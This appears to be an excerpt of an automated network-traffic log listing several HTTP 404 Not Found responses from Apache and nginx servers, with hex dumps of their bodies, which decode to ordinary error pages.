                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 05:58:20 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 05:58:23 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 05:58:26 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 05:58:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 05:58:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 05:58:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 05:58:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 09 Dec 2024 05:58:48 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 09 Dec 2024 05:58:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0
